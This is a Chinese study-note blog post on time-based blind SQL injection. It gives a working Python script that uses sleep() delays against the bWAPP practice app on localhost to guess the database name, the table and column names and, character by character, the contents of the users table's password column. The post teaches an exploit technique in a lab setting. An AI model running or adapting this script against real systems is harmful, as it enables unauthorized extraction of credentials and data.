vlambda博客
学习文章列表

Web安全(二)SQL注入[三]


注:本篇文章为个人学习笔记仅供学习交流。



Web安全(二)SQL注入[三]






时间盲注


通过注入特定语句,根据对页面请求的物理反馈,来判断是否注入成功,如:在SQL语句中使用sleep() 函数看加载网页的时间来判断注入点。
适用场景:通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。





原理


select * from user where id= ‘ ?’


用户输入,替代为 4’ and sleep(3) -- ‘

实际上执行的SQL语句:


select * from user where id= ‘4’ and sleep(3) -- ‘’

当id=4存在时,休眠3秒 

当id=4不存在时,直接返回整条拼接出来的SQL是正确的就执行最后的sleep,前面错误(不存在),sleep(3)不执行。







常用函数


substr(a,b,c):从b位置开始,截取字符串a的c长度
count():计算总数
ascii():返回字符的ASCII码
length():返回字符串的长度
left(a,b):从左往右截取字符串a的前b个字符
sleep(n):将程序暂停n秒






示例


选择时间盲注

Web安全(二)SQL注入[三]

正常输入可看到返回时间为1秒左右,拼接sleep函数看到时间变化了说明存在时间盲注,and前面必须是数据库里的,否则不会执行后面的and后面的命令。

Web安全(二)SQL注入[三]

Web安全(二)SQL注入[三]

python脚本

import requestsfrom urllib.parse import quote
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'Referer': 'http://127.0.0.1/bwapp/bwapp/sqli_15.php', 'Cookie': 'security_level=0; PHPSESSID=hlk1q0q4m2qn6d8rtnhcs0gr65'}


def guset_db_len(): len_of_db = 0 print('猜解数据库长度') for i in range(1, 6): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(length(database())=%s,sleep(3),1)#''' % i title = quote(title) url = url + title r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差), # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 2.5): print('length of database:', i) len_of_db = i continue return len_of_db

def guest_db_name(len_of_db): name_db = '' char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' print('猜解数据库名称') for i in range(1, len_of_db + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' % (i, ord(k)) url = url + quote(title) r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): name_db = name_db + k print('第%s位:%s' % (i, k)) print('name of database:', name_db)

def guest_table_name_len(): len_of_tables = 0 char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,' tables_name = '' print('表长度的总和') for i in range(2, 40): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i title = quote(title) url = url + title r = requests.get(url, headers=headers) # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差), # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 4.5): print('length of tables:', i) len_of_tables = i continue print('猜解数据库名称') for i in range(1, len_of_tables + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#''' % ( i, k1) title = quote(title) url = url + title r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): tables_name = tables_name + k print('第%s位:%s' % (i, k)) print('name of tables:', tables_name)

def guest_name_columns(): len_of_columns = 0 char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,' columns_name = '' print('列长度的总和') for i in range(2, 200): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i title = quote(title) url = url + title r = requests.get(url, headers=headers) # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差), # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 4.5): print('length of columns:', i) len_of_columns = i continue print('猜解列名称') for i in range(1, len_of_columns + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % ( i, k1) title = quote(title) url = url + title r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): columns_name = columns_name + k print('第%s位:%s' % (i, k)) print('name of columns:', columns_name)

def guest_columns_content(): len_columns_content = 0 char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890' columns_content = '' columns_name = 'password' print('列内容长度的总和') for i in range(2, 400): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' % ( columns_name, i) title = quote(title) url = url + title r = requests.get(url, headers=headers) # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差), # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 4.5): print('length of columns content:', i) len_columns_content = i continue print('列的内容') for i in range(1, len_columns_content + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % ( columns_name, i, k1) title = quote(title) url = url + title r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): columns_content = columns_content + k print('第%s位:%s' % (i, k)) print('columns_content:', columns_content)

if __name__ == '__main__': guest_db_name(5) guest_table_name_len() guest_name_columns() guest_columns_content()

参考:CSDN——Gond19





- End -


觉得不错,请点个在看